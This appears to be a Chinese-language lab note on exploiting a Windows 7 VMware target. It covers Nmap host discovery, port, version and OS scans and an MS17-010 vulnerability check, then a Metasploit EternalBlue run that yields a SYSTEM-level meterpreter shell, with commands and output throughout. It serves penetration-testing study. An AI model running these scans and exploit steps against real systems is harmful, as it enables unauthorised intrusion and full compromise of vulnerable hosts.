Nmap 漏動掃描

# Nmap 漏動掃描 ###### tags: `Nmap` ### nmap -T4 -sn 192.168.43.0/24 ```shell Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:39 EDT Nmap scan report for kali (192.168.43.84) Host is up (0.00071s latency). Nmap scan report for 192.168.43.217 Host is up (0.0020s latency). Nmap done: 256 IP addresses (2 hosts up) scanned in 5.23 seconds ``` result: 192.168.43.217 ### tcp scan ``` sudo nmap -T4 -sT -p T:1-65535 192.168.43.217 ``` ### syn scan ``` sudo nmap -T4 -sS -p T:1-65535 192.168.43.217 ``` 若要限定是 TCP Port，則可加上T: 前置。比方說， `-p T:1-65535`。 ### 結果: ```shell Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:44 EDT Nmap scan report for 192.168.43.217 Host is up (0.00033s latency). Not shown: 65519 closed tcp ports (reset) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 554/tcp open rtsp 2869/tcp open icslap 3389/tcp open ms-wbt-server 4623/tcp open unknown 4624/tcp open unknown 5357/tcp open wsdapi 10243/tcp open unknown 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 00:0C:29:DA:FD:12 (VMware) Nmap done: 1 IP address (1 host up) scanned in 26.37 seconds ``` ### 列舉開啟服務的詳細版本 ``` nmap -sV -T4 192.168.43.217 ``` ```shell Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:51 EDT Nmap scan report for 192.168.43.217 Host is up (0.00098s latency). Not shown: 986 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 554/tcp open rtsp? 2869/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 3389/tcp open ssl/ms-wbt-server? 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 10243/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC Service Info: Host: LIAR-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 128.02 seconds ``` ### 猜測檢測目標的作業系統版本 ``` sudo nmap -T4 -sT -O 192.168.43.217 ``` ``` Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:58 EDT Nmap scan report for 192.168.43.217 Host is up (0.00069s latency). Not shown: 986 closed tcp ports (conn-refused) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 554/tcp open rtsp 2869/tcp open icslap 3389/tcp open ms-wbt-server 5357/tcp open wsdapi 10243/tcp open unknown 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown MAC Address: 00:0C:29:DA:FD:12 (VMware) Device type: general purpose Running: Microsoft Windows 7|2008|8.1 OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 3.39 seconds ``` --- ### namp 弱掃 ``` nmap -p 445 --script smb-vuln-ms17-010 192.168.43.217 ``` ### msfconsole: ``` search ms17-010 ``` ``` Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce ``` ### 配置選項 ``` use 3 show options set rhosts 192.168.43.217 run ``` 有漏洞 ``` [+] 192.168.43.217:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 192.168.43.217:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` ### 使用exploit ``` search ms17-010 exploit/windows/smb/ms17_010_eternalblue show options set rhosts 192.168.43.217 ``` ### 返回 meterpreter shell (預設使用) sysinfo ``` Computer : LIAR-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_TW Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows ``` shell (使用window shell) ``` C:\Windows\system32> ``` shell 編碼問題有可能回傳亂碼 (改437 英文) ``` chcp 437 ``` whoami ``` C:\Windows\system32>whoami whoami nt authority\system ``` whoami /priv ``` Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeTcbPrivilege Act as part of the operating system Enabled SeAuditPrivilege Generate security audits Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled ```